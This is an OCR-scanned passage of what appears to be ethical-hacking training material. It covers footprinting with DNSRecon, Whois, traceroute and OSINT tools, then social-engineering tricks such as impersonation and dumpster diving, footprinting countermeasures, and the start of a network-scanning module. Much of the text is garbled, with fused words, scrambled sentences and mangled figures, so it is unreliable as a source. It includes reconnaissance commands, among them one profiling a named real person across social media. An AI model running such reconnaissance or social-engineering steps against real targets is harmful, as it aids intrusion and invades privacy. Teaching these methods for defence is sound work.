DNSRecon
Source:https://github.com
showni n the screenshot,
‘As attackersuse the following to perform
command a reverse
DNSlookup on the targethost:
dnsrecon -r 162.241.216.0-162.241.216.255
In theabovecommand, the-r optionspecifies (first-last)
the rangeof IPaddresses fora
reverse lookup
bybruteforce,
ical andCountermensores
Mackin ©by E-Comel
Copyright
162,241 ,216.0-162, 241,216.25
ReverseLook-up
Performing Rei of a
Range
kup from 162.241,216,0 to 162.241.216.255
PTR 162-241-216-5.unifiedlayer .com 162.241,2
PTR 162. uni fiedlayer.com
PTR 216-0.unifiedtayer.com 162.
PTR ‘unifiedlayer.com 162.
PTR unifiedlayer.com
162.241.2164
PTR 162-2
unifiedlayer.com
162.241.216.6
PTR 8.unifiedlayer.con
162.241.216.8
PTR 41-216-2. uni fiedlayer.com
162.241.216.2
PTR 162-241-216-3.unifiedlayer.com
162.241.216.3
PTR 6-9.unifiedlayer.com
162.241.216.9
PTR box5331,bluehost.com162.241.216.11
PTR box5334.bluchost.com 162-241.216.14
PTR box5348.
bluehost .com 162.241.216. 1
PTR 162-241-216-13.unifiedlayer.com162.241.216.13
PTR 162-241-216-15.unifiedlayer.com 162.241.216.15
PTR 162-241-216-10.unifiedlayer.com 162.241.216.180
PTR 162-241-216-16.unifiedlayer.com 162.241.216.16
PTR167-241.716.12 uni fiedlaver com 162_241.216.12
Parrot Terminal
DNSRecon
Figure2.63:
Screenshot
of showing
reverse DNS
lookupinformation
Source:httpsi//www.yougetsignal.com
shownin the screenshot,
‘As
pointing
IP
to a web server andsearches
web server.
areverse
domain name
or
IP
checktakesa domain address
for other sites knownto be hostedon the same
ical andCountermensores
Mackin ©by E-Comel
Copyright
you
get
signal
ReverseIP DomainCheck
oT
[rcaerTaco Chck
Figure
2.64;
of Domain
SereenshotReverse
IP Check
une
Locatethe NetworkRange
{@
Networkin rangeinermatonatt attackers cresting
find
ang
addrests
sare
ol
|@ ne can
ARIN
hot database
the of IP using
can
alo
(8 ne
Reonalof
ntermet
Registry
fnd he range adresses
(RR)
andthe
Network Footprinting
Thenext stepafterretrieving isgathering
the DNSinformation network-relatedinformation.
We
will now discussnetwork footprinting,
a methodof gathering the footprint
of the target
organization’s
network.Thissection describes
how to locatethe networkrange,traceroute
traceroute
analysis,
tools.
and
Locatethe Network Range
(One
needs basic
gatherto
important
information
does,
the organization about
target
and
organization,
they as
perform
who worksthere,
the
andwhat typeof work do to
such what
network
answers
footprinting.
the target questions
The
network provide
information
about
the
to these internalstructure of
gathering
‘After an attackercan proceed
the information, to find the networkrangeof a target.
system,Detailedinformationis availablefrom the appropriate regional
registrydatabase
regarding IP allocationandthe nature of the allocation,An attackercan alsodeterminethe
subnetmaskof the domainand trace the route betweenthe systemandthe targetsystem
toolsthat are widely
‘Traceroute usedincludePathAnalyzer Pro andVisualRoute.
Obtaining
privateIP addresses The Internet Assigned
can be usefulto attackers. Numbers
‘Authority
(IANA)hasreservedthe following
three blocksof the IP addressspacefor private
(10/8
internets: 10.0.0.0-10.255.255.255 prefix), (172.16/12
172.16.0,0-172.31.255.255 prefix),
(192.168/16
and192.168.0.0-192.168.255.255 prefix).
Usingthe networkrange, the attackercan getinformationabouthowthe networkis structured
andwhichmachines in thenetworks thenetworkrangealsohelps
a re alive.Using to identify
the
networktopology,access controldevice, andOSusedin the targetnetwork.Tofindthe network
of
the
range target network, one needs to enter IP address
the
serverwas
(that gathered
ical
i n Whois
andCountermensores ©
Mackin by E-Comel
Copyright
footprinting)
in the ARINWhois databasesearchtool. A user can alsovisit the ARINwebsite
(https://www.arin.net/about/welcome/region)
andenter the server IPi n theSEARCH Whoistext
box.Thisgivesthe networkrangeof thetargetnetwork.Improperly set up DNSservers offer
attackersa goodchanceof obtaining a list of internalmachines o n the server. In addition,
sometimes, if an attackertraces a route to a machine, it is possible
to obtainthe internalIP
addressof thegateway, whichcan beuseful
Our Region
ths page
ARIN's Region
Complete
List ofCounties i n the ARINRegion
sre 2.65:
Screenshat Region
ofARIN's
ical andCountermensores
Mackin ©by E-Comel
Copyright
Network:
NET-207-46-0-0-1
NetworkWhoisRecord
Queried
whois.arin.net
"207.46.232.182" with
Figure
typically
Attackers
Sereensho
2.6: resultof ARINWhoisdatabase
showing
usemore thanone toolto obtainnetworkinformation,
search
asa single
cesult
tool cannot
provide
allthe required
information.
Traceroute CEH
(A
FER)
Fa)
Fa)
Traceroute (Cont'd)
iaim
i=
IMcP Traceroute
ToP
Traceroute
‘UDP
Traceroute
Es]
‘Traceroute
Finding oftarget
host
network
theroute the
necessary
test on the
attacksandother relatedattacks.Most operating
perform
is
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tracerouteusesthe ICMPprotocol conceptandTimeto Live(TTL)
fieldof the IP header
to find
the pathof the targethosti n thenetwork.
Traceroute utility
‘The through
can detailthe path whichIP packets travelbetweentwo systems.
The utilitycan trace the numberof routers the packets travel through, the round-triptime
(duration
exploiting
i n transiting
DNS
betweentwo routers),
entries,
of,
and,if the routers have
the routers and their networkaffiliation.It can also trace geographic
the names
locations.It worksby
a featureof the Internet ProtocolcalledTTL. TheTTL field indicates the maximum
packet
of a
number routerspacket may
traverse,
andtransmits an ICMPerror message
handlesthe
Each
TTL
router that a packet decrements
count field i n the ICMP headerbyone. Whenthe count reacheszero, the router discards
to theoriginator ofthepacket.
the
x! >
ra
=
=
—
i=
es)
Figure2.67: of Traceroute
tNustration
Theoftwo. and
a
utilityrecords
TTL value
router i n the path,
ofthe
through routeranother
Thispacket
Thissecond
packet
the IPaddress DNSname
makesit
router alsosends
andsendsout with
thefirst router andthen times-out at the next
a n error message backto the originatinghost.
Traceroute
finally continues
do
this
reaches
to
and andrecordstheIPaddress name of eachrouter until a packet
thetargethostor untilit decides
recordsthe time takenfor eachpacket
thatthe hostis unreachable. In the process,
to makea roundtrip to eachrouter. Finally,
it
when it
reaches the destination,the normalICMPpingresponsewill besent backto the sender. The
utilityhelps to revealthe IPaddressesof the intermediatehops i n the route to the targethost
fromthe source.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ICMPTraceroute
Windowsoperatingsystembydefaultuses ICMPtraceroute. Go to the commandpromptand
typethe
tracert
command along
C:\>tracert 216.239.36.10
or
withthe destinationIP address domainname follows:
as
Tracing route to ns3.google.com [216.239.36.10] over a maximum of 30
hops
li<im <i <1 10.10.10.2
20 ms 4 5 1.6.15.234
2ims 19 21 100.66.8.23
20ms 19 19 100.68.8.23
23ms 42 20 72.14.210,200
2ims 21 23 108.170.248.163
68ms 67 67 209.85.242.115
102 ms 102 209.85.247.194
100 ms 106 72.14.239.175
aiams 119 209.85.244.31
aiams 112 209.85.247.118
ai4ms 118 74.125.253.85
aii ms 112 ns3.google.com[216.239.36.10]
Trace complete
TCP network ICMP
Traceroute
Many
devicesi n any are generally
configuredto block traceroute messages. Inthis
scenario,a n attackeruses TCPor UDPtraceroute,whichis alsoknownas Layer4 traceroute. Go
operating
to the terminali n Linux systemandtypethe teptraceroute
destinationIP addressor domainname as follows:
command along with the
teptraceroute www.google.com
ptraceroute wan
running
traceroute -T -0
10.10,10.2 (10.19.10.2
8 16100
132205505.in-£4,
17.491
Figure2.68: showing
Screenshot the outputof TCPTraceroute
ical andCountermensores
Mackin ©by E-Comel
Copyright
UDPTraceroute
LikeWindows,Linuxalsohasa bullt-n traceroute utility, but it usestheUDPprotocol
for tracing
the route to the destination.Go to the terminali n the Linux operating and typethe
system
traceroute command along with thedestinationIPaddressor domainname as follows
traceroute www.google.com
2.69:Screenshotshowing
Figure theoutputof UDPTraceroute
ical andCountermensores
Mackin ©by E-Comel
Copyright
TracerouteAnalysis
amy —
TracerouteAnalysis
We haveseen howthe Traceroute utilityhelpsto find the IPaddresses of intermediatedevices
suchas routersandfirewalls presentbetweena source andits destination. Afterrunningseveral
an attackerwill beableto find thelocation a hop
traceroutes,
the following
traceroute resultsobtained: of in the targetnetwork.Consider
+
1.10.10.20, second to last hop is 1.10.10.1
traceroute
+
traceroute 1.10.20.10, third to last hop is 1.10.10.1
+
traceroute 1.10.20.10, second to last hop is 1.10.10.50
+
traceroute 1.10.20.15, third to last hop is 1.10.10.1
+
traceroute 1.10.20.15, second to last hopis 1.10.10.50
Byanalyzing results,
these diagram
an attackercan drawthe networktopology
network,as shownbelow.
the target
of
=e
a
Figure 2.70TracerouteAnalysis
ical andCountermensores
Mackin ©by E-Comel
Copyright
TracerouteTools
TracerouteTools
Traceroutetoolssuchas PathAnalyzer Pro,VisualRoute,TracerouteNG,and PingPlotter are
usefulfor extractinginformationaboutthe geographical locationof routers,servers, andIP
devicesin a network,Suchtoolshelpus to trace,
identify,
andmonitor thenetworkactivityo n a
=
of
world map.Some the features
Hop-by-hop
traceroutes
Ping
ofthesetoolsare asfollows:
plotting =
Reverse
Historical
Port
probing
tracing
analysis
=
"Detect
networkproblems
Packetlossreporting metrics analysis
Performance
Reverse
DNS Networkperformance
monitoring
PathAnalyzer
Pro
Source:https://www.pathanalyzer.com
PathAnalyzerProperforms with performance
networkroute tracing tests,DNS,
Whois,
andnetworkresolution networkissues.
to investigate
use
Analyzer
‘AttackersPath
route
systemsgraphically. source
destination
Proto identify
the fromthe
As showni n the screenshot,
suchas the hopnumber,
information its IP address,
to
this tool helps
hostname,
target
attackersto gather
ASN,networkname,
loss,latency,
percentage average latency,and standarddeviationfor eachhopi n the
path,
ical andCountermensores
Mackin ©by E-Comel
Copyright
di
VisualRoute
Figure271:
Srensht ofPathAnaly
Pro
Source:http://nwwvisualroute.com
is a traceroute and networkdiagnostic
VisualRoute tool.Attackers
use VisualRoute to
identify
the geographical locationof routers,
servers, andotherIPdevicesi n the target
network.
Thisattackers
between
toolhelps
and obtaining
in trackingthepath
the resultsi n a graphical
thesource anddestination
systems
format.As showni n the screenshot, using
to
tool enablesattackers
VisualRoute
nodename, andgeographical
gatherinformation suchashopnumber,
locationof eachhopi n the route.
IPaddress,
ical andCountermensores
Mackin ©by E-Comel
Copyright
2.72:ScreenshotofViualRoute
Figure
et
oi©
ingcotemenitsate
Footprinting SocialEngineering
through
neeringIan at ofexploiting
human
to
behaviourextractconfident information
throughSocial Engineering
Footprinting
So far,we havediscussed the differenttechniques for gatheringinformation usingonline
resources or tools.Now, we will discussfootprinting
throughsocialengineering, i-e., the art of
obtaining information frompeople byexploitingtheirweaknesses. This section covers the
concept aswell as the techniques usedto gather
informationthrough socialengineering.
Socialengineeringis a non-technicalprocess i n which an attackermisleadsa person into
providing confidential inadvertently.
information In otherwords,the targetis unaware of the
fact that someone is stealing
confidentialinformation.Theattackertakesadvantage of the
gullible
ofpeople
nature
To perform
theirto
provide of
and willingness confidential
information.
socialengineering,an attackerfirst needsto gainthe confidence an authorized
user and then misleadthat user into revealing confidentialinformation.The goal of social
isto and
then
use
engineering obtainthe required
thatconfidential
maliciouspurposes such as gainingunauthorized
information
access to the system,
espionage,network intrusion,fraud,and so on. The information
identity
informationfor
theft,industrial
obtained through social
engineeringmay includecreditcarddetails,socialsecuritynumbers, usernames andpasswords,
other personalinformation, securityproducts in use, OSandsoftware versions, IP addresses,
of
names servers, networklayout information,
Socialengineeringcan be performed
andso on.
i n manyways,suchas eavesdropping,
shouldersurfing,
dumpster
diving, tailgating,
impersonation, authorization,
third-party piggybacking,
reverse
social and
engineering, on. so
ical andCountermensores
Mackin ©by E-Comel
Copyright
Dumpster
InformationUsing
Collecting
Diving,
ShoulderSurfing,
Eavesdropping,
and Impersonation (py Lu
|
Tesgecovention sce
Information UsingEavesdropping,
Collecting Shoulder Surfing,
Dumpster
Diving,and Impersonation
Eavesdropping,
shouldersurfing,
dumpster diving,
and impersonation
are socialengineering
that are widely
techniques usedto collectinformationfrompeople.
Eavesdropping
Eavesdropping of
or isthe
act
videoconferencesecretly
listening
their
without of a
reading
to the conversations
consent.It alsoincludes
fromcommunication media,suchas instant messaging
people over phone
confidentialmessages
or faxtransmissions.It is the act
of interceptingcommunication i n any form suchas audio, video,or text without the
consent ofthe communicating
conversations or attacker
gains
parties.
audio,
intercepting
The
video,or
information
written communication.
bytapping phone
ShoulderSurfing
surfing
Shoulder whereby
is a technique attackers observe
secretly the targetto gain
criticalinformation.In the shouldersurfing technique, an attackerstandsbehindthe
victim and secretly observes activities on thecomputer,
the victim’s such as keystrokes
while entering usernames, passwords, and so on. The technique is effectivein gaining
passwords,
information,
place,
personal
and
similar codes,
identificationnumbers,
data. easily
as it is relativelyshoulder
Attackerscan
security
perform
accountnumbers,
surfing
creditcard
in a crowded
easy to standbehindand watchthe victim without his or her
knowledge.
DumpsterDiving
alsoknownas trashing,
Thisuncouthtechnique, involvesthe attackerrummagingfor
information bins.Theattacker
in garbage maygainvital information
suchas phone
bills,
ical andCountermensores
Mackin ©by E-Comel
Copyright
contact information,financialinformation, operations-related printoutsof
information,
source codes, printoutsof sensitive information, company’s
and so on fromthe target
trashbins,printerwaste bins,sticky
also gather
notes at users’
desks,andso
on. Theattacker
account informationfrom ATM trashbins.The informationcan helpthe
attackerto commit attacks.
may
Impersonation
Impersonation
is a technique
whereby
an attackerpretends
to be a legitimate
or
authorized
person.Attackersperform impersonation attacks personally
or use phones or
‘other
communication mediato misleadtargetsandtricktheminto revealing information
Theattackermightimpersonate a courier/delivery person,janitor,businessman,client,
or he/she
technician, may pretend to be a visitor. Using this technique,
an attacker
gathers
sensitive informationbyscanning
terminalsfor passwords,
searching
important
documents o n desks,rummaging bins,andso on. Theattackermayeven tryto overhear
“shoulder
confidentialconversations and
surf― to obtainsensitive information.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Flow
ootprintingConcepts
Tools
Footprinting
Footprinting
Countermessures
Footprinting
Tools:Maltego
and Recon-ng
2
Module 222
Page tical andCountermensores
Making Copyright©
by Comet
Tools:FOCA and OSRFramework
Footprinting
Footprinting
Tools:OSINTFramework
(SINT Framework
(©
ost Frameworksan open
{ntherng
framework
tentering
f ran
source
nteligence
thatf ocsed on
fomfre tol or
2
Module 222
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Tools(Cont'd)
Footprinting CEH
Tools
Footprinting
Varioustools helpattackersin footprinting.Manyorganizations offer tools that make
information gathering
an easy task. This section describestools intended for obtaining
information
fromvarious sources.
toolsare usedto collectbasicinformationabout targetsystems
Footprinting to exploit
them.
Informationcollectedbythe footprintingtools includesthe target’s
IP locationinformation,
routinginformation, information,
business address, phone numberandsocialsecuritynumber,
details
=
about
a
Maltego
a information,
domainso
sourceof an emailand file,DNS information,and on.
https://www.paterva.com
Source:
is
a that
Maltego program
people,
between
documents,
ete.
can
people,
groupsof the and
real-world
beusedto determinerelationships
websites,
organizations, Internet infrastructure,
links
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure of Maltega
2.72:Screenshot
Recon-ng
Source:https://github.com
Recon-ng is a web reconnaissance frameworkwith independent
modulesfor database
interaction that provides a n environment i n which open-sourceweb-based
reconnaissance can beconducted.
shown
‘As the screenshot,
in attackers use the module recon/domains-
hosts/hackertarget
to extract alist of subdomains
andIPaddresses
associated
with
the target
URL. Attackers
use thismoduleto
gather
target information
Obtainlist of
subdomains
andtheir IP
addresses
FOCA
Figure2.74
of
Screenshatrecon-ng
Source:https://www.elevenpaths.com
Fingerprinting withCollected
Organizations Archives
(FOCA) is a toolusedmainly
to find
metadataandhiddeninformationi n the documentsthat its scans. FOCAis capableof
scanningandanalyzing
a widevariety of documents,with the most common ones being
MicrosoftOffice,
OpenOffice,
or PDF files,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Features:
Web
Search
analyzed
-
for hostsanddomainnamesthrough
Searches
domain.Eachlink is
main
domainnames.
URLs associated
withthe
to extract informationfrom its new hostand
DNSSearch Checks
-
i n NS,
eachdomainto ascertainthe hostnames configured MX,
andSPFservers to discover
thenew hostanddomainnames.
IPResolutionResolves
-
PTR- of a determinedaddress;
ScanningFindsmore servers in the same segment
FOCAexecutes a PTRlogscan.
IP
Bing IP Launches
-
attacksagainst
the DNS.
shownin the
‘As screenshot, attackerssearchthe targetdomainand obtain the file
informationstoredin it. Theextractedfilescan beviewedon the webbrowser.Further,
the attackerscan view additional information such as network domains, roles,
vulnerabilities,
andmetadataof the target
domain.
sats oben
“Aches search
daplaygt
275:
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
(OSRFramework
Source:https://github.com
includesapplications
‘OSRFramework related to username checking, DNSlookups,
information
leaksresearch,
deepwebsearch, andregular extraction.
expression
The tools includedin the OSRFramework package
that attackerscan use to gather
informationon the target
are listedbelow:
© usufy.py Checks
~
domainfy
on
searchfy.pyPerformsa query the platforms
py Checks
-
for the
~
existenceof
i n OSRFramework
domains
phonefy.pyChecks ~
‘As
‘enti
Uses toextract
fy.py -
regular
expressions entities
attackersuse the following
showni n the screenshot, commandto searchfor a target
useron socialmedia platforms,
usufy.py -n Mark Zuckerberg
-p twitter facebook youtube
Sereenshot
Figure 2.76: ofOSRFramework
ical andCountermensores
Mackin ©by E-Comel
Copyright
OSINTFramework
Source:https://osintframework.com
OSINTFramework is an open source intelligence
gathering frameworkthat helpssecurity
professionals
in performing automated footprinting
andreconnaissance,OSINTresearch,
and intelligencegathering. It is focusedon gatheringinformationfrom free tools or
resources.Thisframework
arrangedbycategory,
includes
various
OSINT
tools,
a simplewebinterface that lists
andit is shownas an OSINTtree structure on thewebinterface.
shownin thescreenshot,
‘As following
thetoolslistedincludethe indicators:
>
(T)=
Indicates
a
toolmust
be
installed
link to a
locally
that andrun
©
(R)
-
dork
(D)-Google
Requires registration
(M)-
that
Indicates
manually
a URL
itself
must
contains thesearchterm andthe URL beedited
Recon-Dog
Source:https://www.github.com
Recon-Dog is an all-in-onetool for all basicinformationgathering
collectinformationaboutthe targetsystem.
needs.It uses
APIs
to
ical andCountermensores
Mackin ©by E-Comel
Copyright
Features:
Censys:
a of
to gathermassiveamount informationabout an IP
Usescensys.io
address,
NS
Performs
lookup:
namelookup
TCP
server
Portscan: Scansmostcommon ports
DetectCMS:Candetect400+content management
systems
lookup:
‘Whois
honeypot:
Detect
aWhois honeypot
Performs
Usesshodan.io
lookup
to check
if thetargeti s a
Find subdomains:
Reverse
tofind
Usesfindsubdomains.com subdomains
IP lookup: a reverse IPlookup
Performs to find domainsassociated
with an
IP address
Detecttechnologies:
Useswappalyzer.com
to detect1000+technologies
All:
Runs
utilities
against
all the target
2.78:Screenshot
Figure of Recon
Dog
ical andCountermensores
Mackin ©by E-Comel
Copyright
Billcipher
Source:https://www.github.com
isainformation
Billcipher
operating
‘options
n gathering
system or
thatsupports
suchas DNSlookup,
tool for a website IPaddress.It can workon any
Python
2,Python
Whoislookup,
3,andRuby. Thistoolincludes
portscanning,zone transfer,
various
hostfinder,and
reverse IP lookup,
whichhelp
to gather
criticalinformation,
279:Sereenshot
Figure ofBilCipher
Someadditionalfootprinting
toolsare listedbelow:
=
theHarvester(http://www.edge-security.com)
+
Th3inspector
Raccoon
(https://github.com)
(https://aithub.com)
Orb(hetps://aithub.com)
PENTMENU(hetps://github.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Flow
ootprintingConcepts
Footprinting
Tools
Footprinting
Countermeasures
WB resin
employes
acess
netwoting
Stes network tosci tomtheonan’
wb
enter sete lmao leakage
Ooot
product
revit iomatonin presen reports clogs.
mun
Unithe noma pblihd on th weber
earch
Prevent
engines
web
page
romcaching
2 andse anonymous
registration
series
2
Module 222
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Countermeasures(Cont'd)
Footprinting
Countermeasures
Footprinting
Sofar,w e havediscussed theimportance offootprinting,various waysto perform
thetask,and
thetoolsthat helpin its execution. Now, footprinting
we will discuss i.e., the
countermeasures,
measuresor actionstakento prevent or offsetinformationdisclosure.
Someofthe footprinting
countermeasuresare as follows:
+
*
Restrictthe employees’
Configure
webservers
to
access socialnetworking
sitesfromthe organization's
to avoidinformationleakage
network
+
Educateemployees to use pseudonymson blogs,
groups,andforums
Donot revealcritical
information annualreports,
in pressreleases, catalogs,
product and
Develop
engines fromcaching
a web page anduse anonymousregistration
and enforcesecuritypolicies
suchas informationsecuritypolicy,
services
password
policy,
andso on, to regulate
theinformationthat employees
can revealto third parties
Set apartinternalandexternalDNSor use splitDNS,and restrict zone transferto
authorized
servers
Disable
directorylistings
in the webservers
ical andCountermensores
Mackin ©by E-Comel
Copyright
Conduct a wareness trainingperiodically
security aboutvarious
to educateemployees
socialengineering tricksandrisks
Optfor privacyservices on Whoislookupdatabase
‘Avoid
domain-level cross-linking
forcriticalassets
Encryptandpassword-protect sensitive information
Donot enableprotocols
that are not required
Alwaysuse TCP/IP
andIPSecfiltersfor defensei n depth
Configure through
lS to avoidinformationdisclosure bannergrabbing,
Hidethe IP address
andthe relatedinformation
byimplementing the
VPNor keeping
behinda secure proxy
server
archive.org
Request to deletethe history
of thewebsitefromthe archivedatabase
thedomainname profile
Keep private
Placecriticaldocumentssuchas businessplans documentsofflineto
and proprietary
preventexploitation
Train employees techniques
to thwartsocialengineering andattacks
Sanitizethe detailsprovided
to theInternetregistrars
to hidethe direct
contact detailsof
the organization
functionality
Disablethe geo-tagging geolocation
on cameras to prevent tracking
‘Avoid
revealing
one’s or travel plans
location networking
on social sites
Turn-offgeolocation
accesson all mobiledeviceswhennot required
Ensurethat no criticalinformationsuchas strategicplans, information,
product andsales
is displayed
projections on notice boardsor walls
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
variousas engines,
services,
fotoritngtechnaues,
troughweb
footprinting
such fotoritng troughseach
andfootprinting ses
though networking
social
>
nthe net
can defend
Howorganisations
Module Summary
This modulepresented footprinting concepts alongwith the objectives of footprinting. It
provided a detailedexplanation of the various techniques usedfor footprinting through search
engines.Further, it describedfootprinting throughweb services andsocialnetworking sites.In
in website
and
email techniques.
Whois
and
addition,it discussed footprinting It alsoexplained DNS
footprinting
Moreover,
It also explained
important
described
network
detail.
footprinting
footprinting
footprinting
traceroute
analysis.
it
through
along
socialengineering. Finally,
with
it presented
tools.Themoduleendedwith a detaileddiscussion
an overview of
of howorganizations
can defendthemselves against footprinting andreconnaissanceactivities.
In the next module,
we will discussi n detail howattackersas well as ethicalhackers
and pen
testers perform
networkscanningto collectinformation abouta targetforevaluation beforean
attackor audit.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module03:
Scanning
Networks
Module Objectives
08Discovery
Understanding
Understanding to Scan
various Techniques
DS
Beyond andFirewal
Network
Drawing Digrams
Module Objectives
Afteridentifyingthe targetandperforming the initial reconnaissance,as discussed in the
FootprintingandReconnaissance module,
attackersbegin to searchfor an entrypointinto the
targetsystem.Attackers shoulddetermine
whetherthetargetsystems are active or inactive to
reducethe time spento n scanning.Notably,
the scanningitselfis not the actualintrusion but an
extendedformof reconnaissance i n whichthe attackerlearnsmore about his/her target,
including
information
about
OSs,
from suchreconnaissancehelps
network.
services, andany configuration
theattacker selectstrategies
lapses.
The
for attacking information
gleaned
thetargetsystem
or
At network
will
the endof thismodule,
Describe
the
you beableto:
scanningconcepts
various
scanning
Use
‘=
tools
Performhostdiscoveryto check
for live systems
Performportandservice discovery techniques
usingvarious scanning
beyond
‘Scan (IDS)
intrusion detectionsystems andfirewalls
Perform
operating (OS)
system discovery
Drawnetworkdiagrams
usingnetworkdiscovery
tools
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Flow CEH
Network Scanning
Concepts
Asalready
discussed, the this
footprinting phase
informationabouta potential
gather
is first
He/she
target.
more detailsaboutthe target.
ofhacking,
then uses
in whichtheattackergainsprimary
phase
informationi n the scanning
to
ical andCountermensores
Mackin ©by E-Comel
Copyright
Overview of Network Scanning
(@Network cefers
toaset ofprocedures NetworkSeanning
Process
for services
s canning
used identifying
hosts,ports,a nd
Network
of
s canningone the components
Ineoligence whichcanbeused
gathering
of
byan
to aprofile
ofthe
attacker create target
—
‘come
ro decover livehosts,
IPaddress,
andopenportsafive hosts
Orjectives
of
Network |― Todiscover operating andsystem
systoms architecture
him/her
attackertries to gather
most
machine.It is one of the
enables important
phases
intelligence
to create a profile
information,
of thetarget
including
of
organization.
the specific
gathering for an attacker,
In the process
IPaddresses
which
of scanning,the
that can beaccessed over
the network, the target’s
OSandsystem architecture,
andthe ports along with their respective
services runningon eachcomputer.
Sends
TCP/IP
probes
Getsnetwork
information
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Scanning
‘Types
‘=
Port Liststheopen
Scanning ~
ports
services.
process
and
the services running on the targetcomputerof Portscanning
bysending
i s the checking
a sequence of messagesi n an
attempt
of the targetsystem
state.Thelistening
connecting
to breakin. Portscanninginvolves
Vulnerability
scanningis @ methodfor checking whethera system is exploitable byidentifying its
cataloga
vulnerabilities.A vulnerability scanner consistsof scanning engineand a catalog.
includesa list of common fileswith knownvulnerabilitiesand common exploits
The
tobcan
configurations fixeasily through updated securitypatches anda cleanwebdocument.
A who
thief
are
computer
reaklooks
usually access
points windows.
wants intoa house
the house'spointsof vulnerability,
systems andnetworks,
for
as theyare easily
suchasdoorsand
accessible.
portsare thedoorsandwindowsof a system
Whenit comes to
that an intruder
These
uses to gainaccess,A generalrulefor computer systemsis that the greaterthe numberof open
is
portso n a system,themore vulnerable the system.
withfeweropenportsthananothermachinepresents
However, thereare casesi n whicha system
amuchhigher levelof vulnerability.
Objectives of NetworkScanning
The more theinformation the higher
at handabouta targetorganization, are the chances of
knowing loopholes,
a network'ssecurity and,consequently,for gaining unauthorizedaccess to
it
Someobjectives
for scanninga networkare as follows:
Discover
network's
the
hosts,
addresses,
ports
openports,the attacker thehosts.
live IP andopen of
will determinethe bestmeansof entering
live Using
into the system,
the
Discover
‘An the
OS
and ofthe
target.
This
system architecture
attackerc an formulatean attackstrategy
is alsoknownasfingerprinting,
basedon theOS'svulnerabilities.
Discover the services running/listening on the targetsystem. Doing so givestheattacker
a n indication
that
of thevulnerabilities(based
accessto the targetsystem,
on the service) can be exploited for gaining
Identify
specific
applications or versions ofa particular
service.
Identify
vulnerabilities
i n any of the network systems. Thishelps
a n attacker
to
or networkthrough
the targetsystem
compromise various exploits.
03
Module Page240 ical andCountermensores
Mackin
©
Copyright
by E-Comel
TCPCommunicationFlags
ea
Wo
Acsowiesgement
| ost,
TCPCommunicationFlags
TheTCPheadercontains various flagsthat control the transmission of data across a TCP
connection.SixTCPcontrolflags managetheconnection between hostsand giveinstructionsto
the system. Fourof theseflags (SYN, ACK, FIN,
andRST) governthe establishment, maintenance,
andtermination of a connection.Theother two flags
system. Thesize of
each
section is 6 bits.Whena flag
(PSH
flagis 1bit. Asthereare six flags
that flag
valueis set to “1,―
andURG)
i n theTCPFlags
is automatically
section, tothe
provideinstructions
the size of this
turn:ed on.
co noe
II wow
Options
i 031 Bits —>
12:TCP
Figure
headerformat
ical andCountermensores
Mackin ©by E-Comel
Copyright
TePFlags
Figure3.3:
TCPcommuniaton fags
Thefollowing
are the TCP flags:
communication
Synchronize It notifiesthe transmissionof a new sequencenumber.Thisflag
or “SYN―:
generally the establishment
represents of a connection (three-way
handshake)
between
two hosts.
‘Acknowledgement or “ACK―:
It confirmsthe receipt of the transmissionandidentifiesthe
next expected sequence number. Whenthe system successfully receives a packet, it sets
thevalueof its flagto “1,―
thusimplying thatthe receiver shouldpay attention to it.
Whenit is set to “,―
Pushor “PSH―: it indicatesthat the senderhasraisedthe push
to the receiver; thisimplies
operation thatthe remote system shouldinformthe receiving
application
aboutthe buffereddatacoming fromthe sender.Thesystem raises the PSH
atstart
flag the
buffer of
data
transfer
deadlocks. sets
andend
of
segment
afile and it on the last to prevent
the to
as possible,
Whenflag systemsetsthe
datafirstandall theotherdataprocessing
“1,― theurgent
priorityi sgivento processing
is stopped.
Finish
to
or “FIN―:
remote system sent
Itis set "―to announce thatno more transmissionswill be
andthe connection establishedbytheSYNflagis terminated
to the
or When
thereerror connection,
Reset “RST―:
this
flag
is an
flag
in the current
theconnection is abortedi n responseto theerror. Attackers
andidentifyopen ports.
use this
is set to “1―
and
to scan hosts
gathering flags:
SYNscanningmainly
information
illegal these
dealswith three
three
flags
SYN,ACK,
fromservers during
andRST.You can use
enumeration.
for
ical andCountermensores
Mackin ©by E-Comel
Copyright
TCP/IPCommunication
‘TCP
Session
E stablishment
@ a
‘TCP/IP
Communication
TCPis connection oriented, connection establishment
ie., it prioritizes beforedata transfer
betweenapplications.Thisconnection betweenprotocols through
is possible the three-way
handshake.
initiatesusing
ATCP session a three-way
handshakemechanism:
=
To launcha TCPconnection,the source (10.0.0.2:21)
sendsa SYN packet
to the
destination(10.0.0.3:21),
(Onreceivingthe SYNpacket, bysending
thedestinationresponds a SYN/ACK
packet
back
tothesource.
TheACKpacket
confirmsthe arrivalof thefirstSYNpacket
to the source.
Finally,
the source sendsan ACKpacket
for the ACK/SYN
packet
transmittedbythe
destination.
an "OPEN"
Thistriggers
anddestination,
thereby
connection,
whichcontinues until
theconnection,
allowing
communication
one of themissues a
betweenthe source
"FIN"or "RST"packet
to close
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
34: TCPsession establishment
the
throughoutInternetandworkssimilarly
picks
up a telephone
to
ordinary inwhich
one
telephone communication,
receiver,hearsa dial tone, anddialsa numberthat triggers
ringingat the
other
enduntilsomeone picks
and
upthe receiver says,“Hello.―
Thesystemterminates theestablished TCPsessionas follows:
After completing allthedatatransfersthrough theestablished TCPconnection, thesendersends
the connection termination request to the receiver through a FIN or RSTpacket. Upon receiving
the connection termination request, the receiver acknowledges the termination requestby
sending a n ACK packet to the senderandfinally sendsits own FIN packet. Then, the system
terminates the established connection.
oF
tes
35:TCP
Figure termination
session
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
PortandServiceDiscovery
Tools FD
Seanning osciscvery
Gamercrating?
‘onringerpinting
Scanning
Beyond
IDSandFirewall
Scanning
Tools:Nmap
=
ae
